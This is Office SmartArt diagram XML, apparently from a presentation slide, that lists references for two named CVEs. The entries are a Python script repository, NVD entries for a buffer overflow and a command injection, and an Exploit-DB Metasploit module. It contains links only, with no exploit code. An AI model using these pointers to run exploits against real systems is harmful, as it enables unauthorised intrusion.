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13A46-DDE0-4775-A1A4-0C601DA21A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B0EFA7FC-0218-480D-AA18-7E16F5E8E4C0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Python script: </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4BCD3FD-C74C-47DF-A522-7C814437E215}" type="parTrans" cxnId="{853FD89E-73F3-46C6-AD08-8666981FEA03}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{861143EE-E381-4163-AF5B-25290A7B4413}" type="sibTrans" cxnId="{853FD89E-73F3-46C6-AD08-8666981FEA03}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7A3E79C-9DB8-452C-B1DA-D10DC9C0C496}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>https://github.com/tacnetsol/CVE-2019-10999</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79BA4EA9-2680-4AC5-A696-DE86ADD936A6}" type="parTrans" cxnId="{F625DB23-7F0A-451B-B83C-D61B51B2F468}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B4E00D35-963E-4175-BE6D-C33695636420}" type="sibTrans" cxnId="{F625DB23-7F0A-451B-B83C-D61B51B2F468}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB081BC0-F065-4619-8EBC-18C360E9E9CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Buffer Overflow CVE: </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F513B9A7-F722-4CEB-856B-ADF0124B993F}" type="parTrans" cxnId="{6D28C27D-54FD-4C7B-BDD9-F732619734BB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69643DDA-EC35-408A-B4A7-6571EAE67130}" type="sibTrans" cxnId="{6D28C27D-54FD-4C7B-BDD9-F732619734BB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{19AA5AEF-5C26-4A6C-A88B-D627C6D94E98}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>https://nvd.nist.gov/vuln/detail/CVE-2019-10999#range-4307387</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{70438932-D598-4112-AC59-4143075ABF45}" type="parTrans" cxnId="{54079121-6999-457C-BE62-BB354EFBFA43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BEFB8616-6D43-40FA-9830-A8C562284DE3}" type="sibTrans" cxnId="{54079121-6999-457C-BE62-BB354EFBFA43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37C00CFE-5CA7-447C-A45F-8DEB86D09A7B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Metasploit module: </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25910DB5-623F-4345-838C-79B88783CB1B}" type="parTrans" cxnId="{B4BDEA29-9B31-4AE7-B429-7549B695E100}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14AE7CAD-8781-48D4-827E-92C0044A7845}" type="sibTrans" cxnId="{B4BDEA29-9B31-4AE7-B429-7549B695E100}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D244B34-1074-4C9E-A674-EA46F3202654}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>https://www.exploit-db.com/exploits/39437</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DFF004D-63C5-406B-9A0F-90427AE83CBC}" type="parTrans" cxnId="{F4EA63A9-B812-44E1-819B-F5DFE06B6912}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E86577D-AF6B-4236-8654-4CBED1705CD0}" type="sibTrans" cxnId="{F4EA63A9-B812-44E1-819B-F5DFE06B6912}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{93E57C2A-44D7-4E33-BA3E-C039BAA3F10E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Command Injection CVE: </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6155FE72-B9DA-4C31-A84B-8848E700E2E6}" type="parTrans" cxnId="{DAA3A672-26F9-4557-B974-247EF0FB4BB7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0786117B-2D8A-4F7C-A37F-EE764F768637}" type="sibTrans" cxnId="{DAA3A672-26F9-4557-B974-247EF0FB4BB7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08135AA5-8621-46AD-804B-1D452261B1ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>https://nvd.nist.gov/vuln/detail/CVE-2016-11021</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02A8FAD2-7F31-4DD6-B845-0DEBA88E724B}" type="parTrans" cxnId="{62E82B36-26FD-4D08-A885-BD4F643B855D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55CE9ED6-82E9-4F92-845D-BBC435D170AE}" type="sibTrans" cxnId="{62E82B36-26FD-4D08-A885-BD4F643B855D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B4248D80-03D6-42D4-956C-9B9381D4B6BA}" type="pres">
      <dgm:prSet presAssocID="{EF613A46-DDE0-4775-A1A4-0C601DA21A4A}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FAD4E26A-1775-435D-B0BE-71794D317F0E}" type="pres">
      <dgm:prSet presAssocID="{B0EFA7FC-0218-480D-AA18-7E16F5E8E4C0}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{41F60F41-0B21-45D5-B842-66C1132F86B8}" type="pres">
      <dgm:prSet presAssocID="{B0EFA7FC-0218-480D-AA18-7E16F5E8E4C0}" presName="bgRect" presStyleLbl="bgShp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7141D5CF-9EFB-4FBA-AEA0-4A809CAC8812}" type="pres">
      <dgm:prSet presAssocID="{B0EFA7FC-0218-480D-AA18-7E16F5E8E4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74FEE7-366B-4448-9F20-753140114566}" type="pres">
      <dgm:prSet presAssocID="{B0EFA7FC-0218-480D-AA18-7E16F5E8E4C0}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{70BED0BE-71A7-4C38-B8D6-D5F49F1FFE18}" type="pres">
      <dgm:prSet presAssocID="{B0EFA7FC-0218-480D-AA18-7E16F5E8E4C0}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D42CAFE4-7CDE-4F0E-B248-FA6201F1852C}" type="pres">
      <dgm:prSet presAssocID="{B0EFA7FC-0218-480D-AA18-7E16F5E8E4C0}" presName="desTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="8">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E2530552-1CF3-425B-8CEA-047AC955668A}" type="pres">
      <dgm:prSet presAssocID="{861143EE-E381-4163-AF5B-25290A7B4413}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ABA6CCDA-BBFB-406F-B507-89ED1A89FD5C}" type="pres">
      <dgm:prSet presAssocID="{AB081BC0-F065-4619-8EBC-18C360E9E9CB}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DA1DF49B-B4C6-49BC-8745-6B7E34DE99B6}" type="pres">
      <dgm:prSet presAssocID="{AB081BC0-F065-4619-8EBC-18C360E9E9CB}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="65000"/>
            <a:lumOff val="35000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{8B302A58-D9B5-4FC4-B21B-6D2D8EA958BD}" type="pres">
      <dgm:prSet presAssocID="{AB081BC0-F065-4619-8EBC-18C360E9E9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E25875-CD97-4FEE-AD6D-D81F2CFAF2C1}" type="pres">
      <dgm:prSet presAssocID="{AB081BC0-F065-4619-8EBC-18C360E9E9CB}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{336E447C-0A54-45F6-B6B9-628669E2D156}" type="pres">
      <dgm:prSet presAssocID="{AB081BC0-F065-4619-8EBC-18C360E9E9CB}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5922A613-355E-4F0E-A06B-F532093CED2A}" type="pres">
      <dgm:prSet presAssocID="{AB081BC0-F065-4619-8EBC-18C360E9E9CB}" presName="desTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="8">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F4E7D09B-8AB3-4BF1-9904-CD1155C43C30}" type="pres">
      <dgm:prSet presAssocID="{69643DDA-EC35-408A-B4A7-6571EAE67130}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{39A8740F-432F-479E-AA49-444DF61F1F46}" type="pres">
      <dgm:prSet presAssocID="{37C00CFE-5CA7-447C-A45F-8DEB86D09A7B}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C08FC7E6-C3B8-4FD8-970A-C950F10C58FD}" type="pres">
      <dgm:prSet presAssocID="{37C00CFE-5CA7-447C-A45F-8DEB86D09A7B}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="50000"/>
            <a:lumOff val="50000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{9454F58A-1817-41EB-A937-B9DDAC0D60AC}" type="pres">
      <dgm:prSet presAssocID="{37C00CFE-5CA7-447C-A45F-8DEB86D09A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71B4A98-1BCE-4624-8873-902E5262A200}" type="pres">
      <dgm:prSet presAssocID="{37C00CFE-5CA7-447C-A45F-8DEB86D09A7B}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A4E274E3-DF81-4630-A2F9-D0EC15CDC8E1}" type="pres">
      <dgm:prSet presAssocID="{37C00CFE-5CA7-447C-A45F-8DEB86D09A7B}" presName="parTx" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5ED86A7A-822B-45E7-B80E-905E7E25BFFD}" type="pres">
      <dgm:prSet presAssocID="{37C00CFE-5CA7-447C-A45F-8DEB86D09A7B}" presName="desTx" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="8">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BC689362-EB3E-4608-831B-EE96D7AD4090}" type="pres">
      <dgm:prSet presAssocID="{14AE7CAD-8781-48D4-827E-92C0044A7845}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D2C0C481-2A55-4C61-99EB-845CAEAB17DE}" type="pres">
      <dgm:prSet presAssocID="{93E57C2A-44D7-4E33-BA3E-C039BAA3F10E}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2AFEEE01-404C-4F5D-9226-76866EF59C03}" type="pres">
      <dgm:prSet presAssocID="{93E57C2A-44D7-4E33-BA3E-C039BAA3F10E}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4195E4C3-37BF-4FA0-8DAE-EF606617F8AC}" type="pres">
      <dgm:prSet presAssocID="{93E57C2A-44D7-4E33-BA3E-C039BAA3F1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05DC5C70-E27A-4D4B-A274-F76E56E5290C}" type="pres">
      <dgm:prSet presAssocID="{93E57C2A-44D7-4E33-BA3E-C039BAA3F10E}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BCDBBAE4-8FC4-4F09-99C2-96EA000435F0}" type="pres">
      <dgm:prSet presAssocID="{93E57C2A-44D7-4E33-BA3E-C039BAA3F10E}" presName="parTx" presStyleLbl="revTx" presStyleIdx="6" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0A19D9A4-2874-4105-99EF-6CBB927A9C9D}" type="pres">
      <dgm:prSet presAssocID="{93E57C2A-44D7-4E33-BA3E-C039BAA3F10E}" presName="desTx" presStyleLbl="revTx" presStyleIdx="7" presStyleCnt="8">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{282D5503-DF38-4085-AE3B-5C898BEE7F20}" type="presOf" srcId="{37C00CFE-5CA7-447C-A45F-8DEB86D09A7B}" destId="{A4E274E3-DF81-4630-A2F9-D0EC15CDC8E1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{AC5A4405-2067-4123-94F7-FD5C64035487}" type="presOf" srcId="{08135AA5-8621-46AD-804B-1D452261B1ED}" destId="{0A19D9A4-2874-4105-99EF-6CBB927A9C9D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{34027B0E-CA79-44DA-B630-ADB085432A92}" type="presOf" srcId="{93E57C2A-44D7-4E33-BA3E-C039BAA3F10E}" destId="{BCDBBAE4-8FC4-4F09-99C2-96EA000435F0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{54079121-6999-457C-BE62-BB354EFBFA43}" srcId="{AB081BC0-F065-4619-8EBC-18C360E9E9CB}" destId="{19AA5AEF-5C26-4A6C-A88B-D627C6D94E98}" srcOrd="0" destOrd="0" parTransId="{70438932-D598-4112-AC59-4143075ABF45}" sibTransId="{BEFB8616-6D43-40FA-9830-A8C562284DE3}"/>
    <dgm:cxn modelId="{F625DB23-7F0A-451B-B83C-D61B51B2F468}" srcId="{B0EFA7FC-0218-480D-AA18-7E16F5E8E4C0}" destId="{C7A3E79C-9DB8-452C-B1DA-D10DC9C0C496}" srcOrd="0" destOrd="0" parTransId="{79BA4EA9-2680-4AC5-A696-DE86ADD936A6}" sibTransId="{B4E00D35-963E-4175-BE6D-C33695636420}"/>
    <dgm:cxn modelId="{B4BDEA29-9B31-4AE7-B429-7549B695E100}" srcId="{EF613A46-DDE0-4775-A1A4-0C601DA21A4A}" destId="{37C00CFE-5CA7-447C-A45F-8DEB86D09A7B}" srcOrd="2" destOrd="0" parTransId="{25910DB5-623F-4345-838C-79B88783CB1B}" sibTransId="{14AE7CAD-8781-48D4-827E-92C0044A7845}"/>
    <dgm:cxn modelId="{54DD6E2B-F3CB-4C7F-962D-41FDDD2E4E76}" type="presOf" srcId="{EF613A46-DDE0-4775-A1A4-0C601DA21A4A}" destId="{B4248D80-03D6-42D4-956C-9B9381D4B6BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{62E82B36-26FD-4D08-A885-BD4F643B855D}" srcId="{93E57C2A-44D7-4E33-BA3E-C039BAA3F10E}" destId="{08135AA5-8621-46AD-804B-1D452261B1ED}" srcOrd="0" destOrd="0" parTransId="{02A8FAD2-7F31-4DD6-B845-0DEBA88E724B}" sibTransId="{55CE9ED6-82E9-4F92-845D-BBC435D170AE}"/>
    <dgm:cxn modelId="{DAA3A672-26F9-4557-B974-247EF0FB4BB7}" srcId="{EF613A46-DDE0-4775-A1A4-0C601DA21A4A}" destId="{93E57C2A-44D7-4E33-BA3E-C039BAA3F10E}" srcOrd="3" destOrd="0" parTransId="{6155FE72-B9DA-4C31-A84B-8848E700E2E6}" sibTransId="{0786117B-2D8A-4F7C-A37F-EE764F768637}"/>
    <dgm:cxn modelId="{1BEFDC55-7BF1-4724-87D1-991E6696DB2C}" type="presOf" srcId="{19AA5AEF-5C26-4A6C-A88B-D627C6D94E98}" destId="{5922A613-355E-4F0E-A06B-F532093CED2A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{6D28C27D-54FD-4C7B-BDD9-F732619734BB}" srcId="{EF613A46-DDE0-4775-A1A4-0C601DA21A4A}" destId="{AB081BC0-F065-4619-8EBC-18C360E9E9CB}" srcOrd="1" destOrd="0" parTransId="{F513B9A7-F722-4CEB-856B-ADF0124B993F}" sibTransId="{69643DDA-EC35-408A-B4A7-6571EAE67130}"/>
    <dgm:cxn modelId="{1085AD83-E63D-4C96-8C34-643406626626}" type="presOf" srcId="{B0EFA7FC-0218-480D-AA18-7E16F5E8E4C0}" destId="{70BED0BE-71A7-4C38-B8D6-D5F49F1FFE18}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{853FD89E-73F3-46C6-AD08-8666981FEA03}" srcId="{EF613A46-DDE0-4775-A1A4-0C601DA21A4A}" destId="{B0EFA7FC-0218-480D-AA18-7E16F5E8E4C0}" srcOrd="0" destOrd="0" parTransId="{C4BCD3FD-C74C-47DF-A522-7C814437E215}" sibTransId="{861143EE-E381-4163-AF5B-25290A7B4413}"/>
    <dgm:cxn modelId="{F4EA63A9-B812-44E1-819B-F5DFE06B6912}" srcId="{37C00CFE-5CA7-447C-A45F-8DEB86D09A7B}" destId="{5D244B34-1074-4C9E-A674-EA46F3202654}" srcOrd="0" destOrd="0" parTransId="{7DFF004D-63C5-406B-9A0F-90427AE83CBC}" sibTransId="{7E86577D-AF6B-4236-8654-4CBED1705CD0}"/>
    <dgm:cxn modelId="{850B29D9-431F-4A42-9273-32C003DD46C4}" type="presOf" srcId="{C7A3E79C-9DB8-452C-B1DA-D10DC9C0C496}" destId="{D42CAFE4-7CDE-4F0E-B248-FA6201F1852C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{4812FCE7-1483-41D4-8607-2F979C8BBA73}" type="presOf" srcId="{AB081BC0-F065-4619-8EBC-18C360E9E9CB}" destId="{336E447C-0A54-45F6-B6B9-628669E2D156}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0B38ECF4-F58B-4D72-9E6F-B09C8063D26B}" type="presOf" srcId="{5D244B34-1074-4C9E-A674-EA46F3202654}" destId="{5ED86A7A-822B-45E7-B80E-905E7E25BFFD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9B27A9A0-A546-4F38-8F94-4B725B65BB86}" type="presParOf" srcId="{B4248D80-03D6-42D4-956C-9B9381D4B6BA}" destId="{FAD4E26A-1775-435D-B0BE-71794D317F0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{757BE6D1-CC48-492D-A187-0EC2FC78EC7C}" type="presParOf" srcId="{FAD4E26A-1775-435D-B0BE-71794D317F0E}" destId="{41F60F41-0B21-45D5-B842-66C1132F86B8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{02B40A7E-4C6E-442D-85D2-07F4263BC127}" type="presParOf" srcId="{FAD4E26A-1775-435D-B0BE-71794D317F0E}" destId="{7141D5CF-9EFB-4FBA-AEA0-4A809CAC8812}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{364CB19F-A5A0-41C1-8EB0-B2D2CC552747}" type="presParOf" srcId="{FAD4E26A-1775-435D-B0BE-71794D317F0E}" destId="{BD74FEE7-366B-4448-9F20-753140114566}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{4206E0C7-7151-4C3C-A266-CE3B1D4AF90F}" type="presParOf" srcId="{FAD4E26A-1775-435D-B0BE-71794D317F0E}" destId="{70BED0BE-71A7-4C38-B8D6-D5F49F1FFE18}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C55196DF-E382-414E-8799-5984A05402D4}" type="presParOf" srcId="{FAD4E26A-1775-435D-B0BE-71794D317F0E}" destId="{D42CAFE4-7CDE-4F0E-B248-FA6201F1852C}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{89496327-4F62-48AE-AE5D-F31ECE270F0A}" type="presParOf" srcId="{B4248D80-03D6-42D4-956C-9B9381D4B6BA}" destId="{E2530552-1CF3-425B-8CEA-047AC955668A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{04438C36-468C-401F-872A-0149EF6C2D7E}" type="presParOf" srcId="{B4248D80-03D6-42D4-956C-9B9381D4B6BA}" destId="{ABA6CCDA-BBFB-406F-B507-89ED1A89FD5C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{62D8AE9C-8EF2-4746-95CA-D729166A54C8}" type="presParOf" srcId="{ABA6CCDA-BBFB-406F-B507-89ED1A89FD5C}" destId="{DA1DF49B-B4C6-49BC-8745-6B7E34DE99B6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{AB8A7E8B-B9E0-4BAA-973E-E9E6EE5E30FC}" type="presParOf" srcId="{ABA6CCDA-BBFB-406F-B507-89ED1A89FD5C}" destId="{8B302A58-D9B5-4FC4-B21B-6D2D8EA958BD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{BA0420D2-B236-4DD1-A539-C5680FFCE379}" type="presParOf" srcId="{ABA6CCDA-BBFB-406F-B507-89ED1A89FD5C}" destId="{4EE25875-CD97-4FEE-AD6D-D81F2CFAF2C1}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{AFE92B0C-8F57-4A3D-A8CE-E6CC4CD8A35B}" type="presParOf" srcId="{ABA6CCDA-BBFB-406F-B507-89ED1A89FD5C}" destId="{336E447C-0A54-45F6-B6B9-628669E2D156}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{A784DDCA-12A1-419B-8408-8DE4603047EB}" type="presParOf" srcId="{ABA6CCDA-BBFB-406F-B507-89ED1A89FD5C}" destId="{5922A613-355E-4F0E-A06B-F532093CED2A}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C7797340-8420-4FAF-BD27-6A56CE871455}" type="presParOf" srcId="{B4248D80-03D6-42D4-956C-9B9381D4B6BA}" destId="{F4E7D09B-8AB3-4BF1-9904-CD1155C43C30}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{BDE27B1D-ED77-4951-9ADC-C6F341DAEA8B}" type="presParOf" srcId="{B4248D80-03D6-42D4-956C-9B9381D4B6BA}" destId="{39A8740F-432F-479E-AA49-444DF61F1F46}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
